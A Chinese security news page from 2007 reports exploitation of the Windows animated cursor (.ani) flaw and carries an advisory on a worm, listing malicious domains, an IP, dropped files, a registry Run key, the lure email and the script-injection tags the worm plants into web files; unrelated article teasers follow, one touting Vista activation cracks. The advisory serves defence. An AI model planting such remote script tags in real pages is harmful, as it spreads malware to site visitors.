光标漏洞的复合型蠕虫现身 Vista操作系统曝出首个重大漏洞

光标漏洞的复合型蠕虫现身 Vista操作系统曝出首个重大漏洞

3月30日,微软Vista操作系统曝出首个重大漏洞。昨天,瑞星反病毒专家发现该漏洞已经开始被黑客利用,使用Windows Vista和XP的用户,在访问带毒网站时会被威金病毒、盗号木马(木马查杀软件下载)等多种病毒感染。据监测,国内已有近十个网站被黑客攻陷。

此前,微软公司曾发出警告称,攻击者正在积极利用Windows动画光标(.ani)文件中一个未修复漏洞。这个漏洞将影响Windows XP以上操作系统和IE6以上的浏览器,微软最新的Vista和IE7都不能幸免。目前微软还没有发布此漏洞的补丁。

据瑞星安全专家介绍,ANI文件是Windows鼠标动态光标文件,由于Vista等系统在处理ANI文件的方式上存在漏洞,黑客可以构造特殊格式的ANI文件,当用户浏览含有该文件的网页,或点击该文件就会自动下载运行黑客指定的病毒、木马及后门程序等。目前利用该漏洞的病毒中,威金(Worm.Viking)变种及窃取网络游戏的木马病毒占多数。

这是Vista系统第一次曝出重大漏洞,利用该漏洞传播病毒的网站数量正逐步增多,攻击代码很可能已经公开。

安全专家提醒普通网民不要轻易登陆陌生网站,尤其是通过电子邮件、聊天软件等发送来的陌生网址。网站的管理员,应该加强对自己服务器日志的管理,尤其要注意不明来源的ANI及JPG等格式图片文件,一旦出现异常尽快处理。

------------------C.I.S.R.T.信息------------------

一个非常不好的消息要告诉大家,利用微软动画光标漏洞的新蠕虫已经现身。我们收到了相关的样本,通过分析,我们已经确认这是一个复合型蠕虫,含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高,CISRT Lab决定再次发布中度风险警报,提醒广大网友提高警惕!

同时我们建议广大网友、企业网管对以下两个域名和IP进行屏蔽:

2007ip.com
microfsot.com
61.153.247.76

蠕虫的大小在13K左右,会释放文件到以下目录:

%SYSTEM%\sysload3.exe

添加注册表键值:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"

会发送邮件:

From: i_lov e_cq@sohu. com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.micr of  sot.com/<remove d>/134952.htm

感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:

<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%6   1%63 %72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>

注意邮件和网页中提到的网址中都含有.ani 0-day漏洞的恶意文件。

Kaspersky检测为Trojan-Downloader.Win32.Agent.bky,毒霸命名为Worm.MyInfect

目前我们收到样本的MD5值为

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

2007.3.31 22:45第一次更新:

作者在蠕虫体内表达了对Kaspersky的不满

时间: 2007-03-30

Linux曝出Sudo提权漏洞 任意用户亦可运行root命令

作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令. 然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 -- 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令. (题图 via Hacker News ) 据悉,Sudo 特指"超级用户".作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需

Win Vista操作系统安全性能剖析

安全性是 Windows Vista 体系结构的基础.利用 Windows Vista,您将能够连接到想连接的任何用户,并且做想做的任何事情,相信 Windows Vista 能保证您的信息和计算机的安全. Windows Vista 的安全功能防止最新生成的威胁(如蠕虫.病毒和 malware).在不可能的成功入侵事件中,Windows Vista 确保将损坏程度降至最低. 用户帐户保护 通过运行带有受限许可的应用程序,Windows Vista 用户帐户保护在用户和管理特权之间架起一座桥梁.

用vbs更改Windows Vista操作系统序列号的图文教程

Windows Vista通过产品序列号--或称密钥.ProdUCt Key.CD Key以及日后可能出现的针对大客户的Volume License Key (VLK)等--来判断自身是否为正版,只有正确的序列号才能激活Windows Vista,不然,Windows Vista便只能使用在精减模式下. 在某些情况下,当我们安装Windows Vista时,可能会因操作失误或别的原因而输入错误的序列号,导致无法通过Windows 正版验证,无法激活.那么,此时我们是不是用正确的序列号需要重新安装

关于Android中WebView远程代码执行漏洞浅析

1. WebView 远程代码执行漏洞描述 Android API level 16以及之前的版本存在远程代码执行安全漏洞,该漏洞源于程序没有正确限制使用WebView.addJavascriptInterface方法,远程攻击者可通过使用Java Reflection API利用该漏洞执行任意Java对象的方法,简单的说就是通过addJavascriptInterface给WebView加入一个JavaScript桥接接口,JavaScript通过调用这个接口可以直接操作本地的JAVA接口.该

Win2008 蓝屏漏洞揭秘

9月初,在各大安全网站上登载了一个Windows操作系统的蓝屏漏洞的消息,这个漏洞的出现如同一颗石子,打破了近半年来Windows没有爆出重大漏洞的沉寂. 蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务--目前,漏洞的利用代码还限制在小范围内,不过漏洞攻击工具却已经研制出来了,现在为大家揭秘蓝屏漏洞的利用过程. 问题: Windows Server 2008蓝屏漏洞 危害: 服务器出现蓝屏停止服务

思科漏洞主角林恩访谈路由器是定时炸弹

安全研究员迈克尔·林恩(Michael Lynn)从ISS(互联网安全系统)公司辞职后,不顾思科及ISS公司的阻挠,上周三在黑帽安全会议上演示了如何利用漏洞攻击和控制思科的路由器,在业内激起轩然大波,思科和ISS的公众形象也一落千丈. 会议结束第二天,林恩与思科及ISS达成和解协议,他同意删除有关这一漏洞的研究资料,不泄露实现这一攻击的具体方法,不再散布他的演示稿.(事实上,林恩演示时用的长达35页的 的幻灯片<The Holy Grail:Cisco IOS Shellcode And Exp

破解Vista激活机制三大方法总结

全世界的"黑客"们,都希望找到这个被开发者称为"史上最安全"的操作系统软件的"命门",为此大家前仆后继.目前,网络上已经透露出三种破解Vista激活机制的方法: 1.时间停止法 原理:TimeStop(时间停止)法,首先更改系统时间为2099年12月31日(vista支持的最后时间),破解完后更改为当前时间,通过停止Vista中的计数器以达到强行冻结Vista验证时间的目的,最终系统激活时间定格在30天.黑客组织已经在网络上提供傻瓜激活程序下载,

对RPC DCOM 蠕虫的设想

最近好象几乎每一个大的漏洞公布出来,接着都会有一个针对这个漏洞的蠕虫(worm) 流行,最近闹得很凶的 RPC DCOM 漏洞估计也即将成为 worm 的新传播载体.好象写 worm 是一个热门,很多人也觉得好奇,觉得 worm 是很深的一种技术,其实这个是很简单的编程游戏而已.我一直有个想法就是想写一篇关于 worm 的技术分析(---为了不教坏小孩子:),只是一直懒得提笔,本人对蠕虫的编写已经失去了兴趣,现在在新的 worm 风暴即将到来之前,我这里很简单分析一下蠕虫的相关技术,并对 RPC

Vista下调整C盘等硬盘分区大小的图文方法

Vista系统安装之后,很多XP的老用户发现,C盘的空间空间不足了,以前留下的10g甚至15g的分区,都不够Vista系统的折腾.又或者,你可能也需要调整D盘或者其他硬盘的大小,那么,怎么在Window Vista下面安全的进行C盘或者其他分区大小的调整呢? 特别在Vista操作系统下进行了全面的测试,像网上流传的PM分区魔法师,就是Norton PartitionMagic V8.05 Build 1371 简装汉化版这些,根本不能在VISTA下面运行的.Vista之家团队特别推荐一款软件,A